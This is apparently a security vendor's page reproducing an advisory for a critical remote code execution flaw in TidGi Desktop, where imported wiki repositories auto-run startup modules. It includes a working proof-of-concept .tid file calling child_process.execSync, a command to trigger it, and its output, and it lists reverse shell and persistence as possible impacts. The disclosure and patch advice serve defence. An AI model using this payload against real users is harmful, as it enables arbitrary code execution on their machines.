GHSA-9HC2-HJX8-Q6PV

GHSA-9HC2-HJX8-Q6PV is a critical-severity code injection vulnerability in tidgi (npm), affecting versions <= 0.13.0. No fixed version is listed yet.

Does this CVE actually affect you?

Kodem shows which CVEs are reachable and running in your applications, so you fix what's exploitable, not just what's listed.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Runtime intelligence, not another scanner.

Summary

TidGi Desktop Remote Code Execution via Malicious TiddlyWiki Repository Import, Tiddler Startup Module Auto-Execution

Description

TidGi Desktop through 0.13.0 contains a critical remote code execution vulnerability exploitable via a single Git repository import. The vulnerability leverages TiddlyWiki's module system, which automatically discovers and executes JavaScript code embedded in .tid files placed in the wiki's tiddlers/ directory:

  1. Auto-loading of .tid files (src/services/wiki/wikiWorker/loadWikiTiddlersWithSubWikis.ts:59-92), when TidGi boots a wiki workspace, loadWikiTiddlers reads all .tid files from the filesystem and adds them to the wiki store via wiki.addTiddlers().

  2. Automatic module registration (node_modules/tiddlywiki/boot/boot.js:2564-2565), defineTiddlerModules() iterates all tiddlers in the store. Any tiddler with a module-type field is passed to $tw.modules.define(), registering it as an executable module.

  3. Automatic startup execution (node_modules/tiddlywiki/boot/boot.js:2572-2634), all registered modules of type "startup" are collected and their exports.startup() function is called during the boot sequence. When no platforms restriction is set, doesTaskMatchPlatform() returns true, and the startup function executes with full Node.js require() access in the Wiki Worker process.

The full chain was verified on macOS with TiddlyWiki 5.4.0 and Node.js v26, require('child_process').execSync() successfully executed arbitrary shell commands.

Affected Product

  • Product: TidGi Desktop
  • Vendor: Lin Onetwo (https://github.com/tiddly-gittly)
  • Repository: https://github.com/tiddly-gittly/TidGi-Desktop
  • Affected Versions: 0.13.0 (latest release)
  • Components: src/services/wiki/wikiWorker/loadWikiTiddlersWithSubWikis.ts (tiddler loading), src/services/wiki/wikiWorker/startNodeJSWiki.ts (wiki boot), node_modules/tiddlywiki/boot/boot.js (TiddlyWiki core, defineTiddlerModules, startup dispatch)
  • Package: tidgi (npm)

Vulnerability Details

Root Cause 1, .tid Files Auto-Loaded Before Module Processing

File: src/services/wiki/wikiWorker/loadWikiTiddlersWithSubWikis.ts:59-92

const tiddlerFiles = wikiInstance.loadTiddlersFromPath(subWikiTiddlersPath);

for (const tiddlerFile of tiddlerFiles) {
    // Register file info for filesystem adaptor
    // ...
    // Add tiddlers to wiki
    wikiInstance.wiki.addTiddlers(tiddlerFile.tiddlers);   // ← Line 92
}

File: src/services/wiki/wikiWorker/startNodeJSWiki.ts:256

wikiInstance.boot.startup({ bootPath: TIDDLY_WIKI_BOOT_PATH });

This triggers $tw.boot.startup(), which internally calls loadStartup()loadTiddlersNode()$tw.loadWikiTiddlers($tw.boot.wikiPath) (boot.js:2381). TidGi overrides loadWikiTiddlers at startNodeJSWiki.ts:123 to intercept and inject sub-wiki tiddlers, but the original function still loads all .tid files from the main wiki's tiddlers/ directory.

Root Cause 2, Automatic Module Registration via module-type Field

File: node_modules/tiddlywiki/boot/boot.js:1514-1534, defineTiddlerModules()

$tw.Wiki.prototype.defineTiddlerModules = function() {
    this.each(function(tiddler,title) {
        if(tiddler.hasField("module-type") && (!tiddler.hasField("draft.of"))) {
            switch(tiddler.fields.type) {
                case "application/javascript":
                    $tw.modules.define(
                        tiddler.fields.title,           // "$:/plugins/poc/startup.js"
                        tiddler.fields["module-type"],   // "startup"
                        tiddler.fields.text              // attacker's JS code
                    );
                    break;
            }
        }
    });
};

This function is called during execStartup() (boot.js:2565), after loadStartup() has already loaded all .tid files into the wiki store. Any tiddler with module-type: startup and type: application/javascript is automatically registered as an executable module.

Root Cause 3, Automatic Startup Execution with Full Node.js Access

File: node_modules/tiddlywiki/boot/boot.js:2572-2576, Collecting startup modules

$tw.boot.remainingStartupModules = [];
$tw.modules.forEachModuleOfType("startup", function(title, module) {
    if(module.startup) {
        $tw.boot.remainingStartupModules.push(module);  // ← attacker's module collected
    }
});

File: node_modules/tiddlywiki/boot/boot.js:2631-2634, Executing startup

if(!$tw.utils.hop(task,"synchronous") || task.synchronous) {
    const thenable = task.startup();  // ← exports.startup() called

File: node_modules/tiddlywiki/boot/boot.js:2658-2677, Platform check (passes without explicit platforms)

$tw.boot.doesTaskMatchPlatform = function(taskModule) {
    var platforms = taskModule.platforms;
    if(platforms) {
        // ... check each platform ...
        return false;  // ← only rejects if platforms is explicitly set
    }
    return true;       // ← no platforms field → passes unconditionally
};

Complete Boot Sequence (verified against TiddlyWiki 5.4.0)

$tw.boot.startup()                              // boot.js:2589
  ├── initStartup()                              // boot.js:2393
  ├── loadStartup()                              // boot.js:2538
  │     └── loadTiddlersNode()                   // boot.js:2356
  │           └── $tw.loadWikiTiddlers(wikiPath)  // boot.js:2381
  │                 └── wiki.addTiddlers(...)     // loads .tid files into store
  └── execStartup()                              // boot.js:2553
        ├── defineShadowModules()                 // boot.js:2564
        ├── defineTiddlerModules()                 // boot.js:2565  ← registers attacker's module
        ├── forEachModuleOfType("startup", ...)   // boot.js:2572  ← collects startup modules
        └── executeNextStartupTask()              // boot.js:2611
              └── task.startup()                  // boot.js:2634  ← exports.startup() executes

Exploitation Conditions

  • No authentication required, importing a wiki is a standard feature
  • Only user interaction: click "Add Workspace" → select folder/URL → confirm

Complete Attack Flow

┌──────────────────────────────────────────────────────────────┐
│ Step 1: Attacker creates a malicious TiddlyWiki repository   │
├──────────────────────────────────────────────────────────────┤
│  tiddlers/$__plugins__poc__startup.js.tid:                   │
│                                                              │
│    title: $:/plugins/poc/startup.js                          │
│    type: application/javascript                              │
│    module-type: startup                                      │
│                                                              │
│    exports.startup = function() {                            │
│      require('child_process').execSync('calc');              │
│    };                                                        │
│                                                              │
│  + tiddlywiki.info + any other wiki files                    │
└──────────────────────────────────────────────────────────────┘
                          ↓
┌──────────────────────────────────────────────────────────────┐
│ Step 2: Victim imports the repository into TidGi Desktop     │
├──────────────────────────────────────────────────────────────┤
│  Add Workspace → Clone Git Repository / Open Local Folder    │
│  → TidGi boots the wiki                                      │
└──────────────────────────────────────────────────────────────┘
                          ↓
┌──────────────────────────────────────────────────────────────┐
│ Step 3: RCE, startup module auto-executes in Node.js Worker │
├──────────────────────────────────────────────────────────────┤
│  loadWikiTiddlers loads .tid file → wiki.addTiddlers()       │
│  boot.startup() → execStartup()                              │
│  defineTiddlerModules() → $tw.modules.define("startup", ...) │
│  executeNextStartupTask() → exports.startup()                │
│  → require('child_process').execSync('...') executes         │
└──────────────────────────────────────────────────────────────┘

Proof of Concept

Minimal .tid File (place in tiddlers/ directory)

title: $:/plugins/poc/startup.js
type: application/javascript
module-type: startup

exports.startup = function() {
  require('child_process').execSync('touch /tmp/TidGi-RCE-PoC.txt');
  console.log('STARTUP_EXECUTED');
};

Verification Output (macOS, TiddlyWiki 5.4.0, Node.js v26)

$ node -e "
  const \$tw = require('tiddlywiki/boot/boot.js').TiddlyWiki();
  \$tw.boot.argv = ['/tmp/evil-wiki'];
  \$tw.boot.startup();
"
STARTUP_EXECUTED

$ ls -la /tmp/TidGi-RCE-PoC.txt
-rw-r--r--  1 nuii  wheel  0 Jun  3 00:01 /tmp/TidGi-RCE-PoC.txt

The message STARTUP_EXECUTED printed from within the attacker's exports.startup() function, and the file /tmp/TidGi-RCE-PoC.txt was created by execSync('touch ...'), confirming arbitrary command execution.

Reproduction Evidence

Step 1, Malicious .tid file content

title: $:/plugins/poc/startup.js
type: application/javascript
module-type: startup

exports.startup = function() {
  require('child_process').execSync('touch /tmp/TidGi-RCE-PoC.txt');
  console.log('STARTUP_EXECUTED');
};

Step 2, TiddlyWiki boot with malicious wiki at /tmp/evil-wiki

$ node -e "
  const \$tw = require('tiddlywiki/boot/boot.js').TiddlyWiki();
  \$tw.boot.argv = ['/tmp/evil-wiki'];
  \$tw.boot.startup();
"
STARTUP_EXECUTED

Step 3, Verified RCE: /tmp/TidGi-RCE-PoC.txt created

$ ls -la /tmp/TidGi-RCE-PoC.txt
-rw-r--r--  1 nuii  wheel  0 Jun  3 00:01 /tmp/TidGi-RCE-PoC.txt

Patch Recommendation

Fix 1: Disallow module-type on User Tiddlers

TiddlyWiki should distinguish between system tiddlers (shipped with TidGi or installed as official plugins) and user-created tiddlers. User-created tiddlers should never be allowed to define module-type.

// In defineTiddlerModules() or equivalent
if (tiddler.hasField("module-type") && !tiddler.fields.title.startsWith("$:/")) {
    // User tiddler, silently drop module-type field
    return;
}

Fix 2: Sandbox User Modules

If user-created modules must be supported, execute them in a restricted context without access to Node.js built-ins:

// Replace direct require access with a restricted API surface
const vm = require('vm');
const sandbox = { console, $tw, Buffer };
vm.runInNewContext(moduleCode, sandbox, { timeout: 5000 });

Fix 3: Whitelist Allowed module-type Values

Only allow known safe module-type values for user tiddlers:

const ALLOWED_USER_MODULE_TYPES = ['widget', 'macro', 'filter', 'parser'];
if (!ALLOWED_USER_MODULE_TYPES.includes(tiddler.fields['module-type'])) {
    return; // Block startup, library, saver, etc.
}

Impact

Capability Status Details
Remote Code Execution ✅ Full Node.js access require('child_process') available
Arbitrary File Read require('fs').readFileSync()
Arbitrary File Write require('fs').writeFileSync()
Reverse Shell Node.js net module
Persistence Write to startup scripts, LaunchAgents, crontab
User Interaction 1 click Import repository
Cross-Platform Windows, macOS, Linux

Untrusted input is evaluated as executable code within the application's runtime environment. Typical impact: arbitrary code execution within the application's privilege context.

GHSA-9HC2-HJX8-Q6PV has a CVSS score of 9.6 (Critical). The vector is network-reachable, no privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.

Affected versions

tidgi (<= 0.13.0)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Already deployed Kodem?

See it in your environmentNew to Kodem? Get a demo →

Remediation advice

No fixed version is listed for GHSA-9HC2-HJX8-Q6PV yet.

In the interim: Never evaluate untrusted input as code. Use sandboxed evaluation environments if dynamic execution is required.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is GHSA-9HC2-HJX8-Q6PV? GHSA-9HC2-HJX8-Q6PV is a critical-severity code injection vulnerability in tidgi (npm), affecting versions <= 0.13.0. No fixed version is listed yet. Untrusted input is evaluated as executable code within the application's runtime environment.
  2. How severe is GHSA-9HC2-HJX8-Q6PV? GHSA-9HC2-HJX8-Q6PV has a CVSS score of 9.6 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of tidgi are affected by GHSA-9HC2-HJX8-Q6PV? tidgi (npm) versions <= 0.13.0 is affected.
  4. Is there a fix for GHSA-9HC2-HJX8-Q6PV? No fixed version is listed for GHSA-9HC2-HJX8-Q6PV yet. Monitor the advisory for updates and apply mitigations in the interim.
  5. Is GHSA-9HC2-HJX8-Q6PV exploitable, and should I be worried? Whether GHSA-9HC2-HJX8-Q6PV is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether GHSA-9HC2-HJX8-Q6PV is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix GHSA-9HC2-HJX8-Q6PV? No fixed version is listed yet. In the interim: Never evaluate untrusted input as code. Use sandboxed evaluation environments if dynamic execution is required.

Stop the waste.
Protect your environment with Kodem.